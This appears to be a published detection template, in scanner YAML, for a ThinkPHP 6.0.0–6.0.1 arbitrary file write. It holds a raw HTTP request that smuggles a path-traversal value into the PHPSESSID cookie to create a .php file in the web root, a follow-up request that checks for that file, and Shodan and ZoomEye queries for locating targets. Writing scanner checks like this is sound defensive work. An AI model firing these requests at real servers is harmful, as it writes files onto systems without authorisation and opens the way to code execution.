ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
PoC代码[已公开]
id: thinkphp6-arbitrary-write
info:
name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
author: arliya
severity: critical
description: |
ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
reference:
- https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
- https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
classification:
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: thinkphp
product: thinkphp
shodan-query: title:"ThinkPHP"
zoomeye-query: app="ThinkPHP"
tags: thinkphp,file-upload,rce,vuln
variables:
random_filename: "{{to_lower(rand_base(11))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
Content-Type: application/x-www-form-urlencoded
- |
GET /{{random_filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_1
words:
- "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"
- type: dsl
dsl:
- "status_2 == 200"
# digest: 4a0a0047304502200d8d1bea0f0853a869dbe8b9e79e55afeac57042ff2dddd390c33c67c27c36d7022100d19f40739f3a1fe0b0914f69079bb4762e9e3a2e0aae640f0f0d810a4c4d4f3d:922c64590222798bb761d5b6d8e72950